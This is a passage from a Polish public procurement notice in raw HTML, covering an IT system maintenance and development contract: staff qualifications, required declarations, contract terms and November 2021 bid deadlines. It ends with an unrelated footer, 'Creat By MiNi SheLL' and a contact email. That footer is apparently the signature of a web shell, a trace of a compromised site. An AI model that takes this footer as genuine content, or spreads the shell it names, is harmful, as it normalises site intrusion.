terminu składania ofert przez co najmniej 2 miesiące pełnił rolę analityka w realizacji co najmniej 2 projektów dotyczących budowy lub rozbudowy systemu teleinformatycznego, o wartości projektu co najmniej 250 000,00 złotych brutto każdy.	<br/>Minimalna liczba udostępnionych osób jako analityk biznesowy - 1 <br/><br/>VII.	Tester	<br/>1.	Wykształcenie wyższe II stopnia;<br/>2.	Certyfikat w zakresie:<br/>- prowadzenia testów systemów IT ISTQB lub równoważny (międzynarodowy, obejmujący ustandaryzowane procesy oraz techniki związane z testowaniem, poprawiające jakość wytwarzanego oprogramowania);<br/>3.	Dobra znajomość:<br/>- automatyzacji testów.	<br/>Doświadczenie: <br/>W ciągu ostatnich 5 lat przed upływem terminu składania ofert przez co najmniej 2 miesiące pełnił rolę testera w realizacji co najmniej 2 projektów dotyczących budowy lub rozbudowy lub utrzymania systemu teleinformatycznego, o wartości projektu co najmniej 250 000,00 złotych brutto każdy.	<br/>Minimalna liczba udostępnionych osób jako tester - 2 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie Wykonawcy, sporządzone według wzoru stanowiącego Załącznik nr 5 do SWZ o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art.108 ust. 1 pkt 1, 2, 4, 5 oraz art. 109 ust. 1 pkt 4 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, potwierdzające spełnienie warunków określonych w Rozdziale IX ust. 1 pkt 4 lit. a SWZ – sporządzony według wzoru stanowiącego Załącznik nr 4A do SWZ ;<br/>2)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usługi, tj. lista osób z uprawnieniami wymienionymi w Rozdziale IX ust. 1 pkt 4 lit. b wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – sporządzony zgodnie z Załącznikiem nr 4B do SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>1)	postępowania o zamówienie publiczne, którego dotyczy,<br/>2)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>3)	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielnie zamówienia w stosunku do żadnego z Wykonawców nie może być podstaw do wykluczenia z postępowania o udzielenie zamówienia wskazanych w Rozdziale X. W odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców wspólnie składających ofertę dołącza oddzielnie oświadczenie o niepodleganiu wykluczeniu z przyczyn określonych w Rozdziale X, zgodnie ze wzorem stanowiącym Załącznik nr 3 do SWZ oraz oświadczenie o spełnianiu warunków udziału w postępowaniu zgodne ze wzorem stanowiącym Załącznik nr 2 do SWZ.<br/>3.	W odniesieniu do warunku, o którym mowa w Rozdziale IX ust. 1 pkt 4, SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy będą odpowiedzialni za wykonanie danego zakresu zamówienia. W takim przypadku, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy, zgodnie ze wzorem stanowiącym Załącznik Nr 8 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z projektowanymi postanowieniami umowy, które stanowią załącznik nr 9 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-02 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Na Platformie pod adresem: https://platformazakupowa.pl/pn/pana</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-02 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający, informuje, że na kryterium ceny o wadze 60% składa się : <br/>1)Kryterium C1 – Cena brutto oferty za usługę utrzymania - waga 20%<br/>2) Kryterium C2 – Cena brutto oferty za usługę rozwoju - 40 %

Creat By MiNi SheLL
Email: jattceo@gmail.com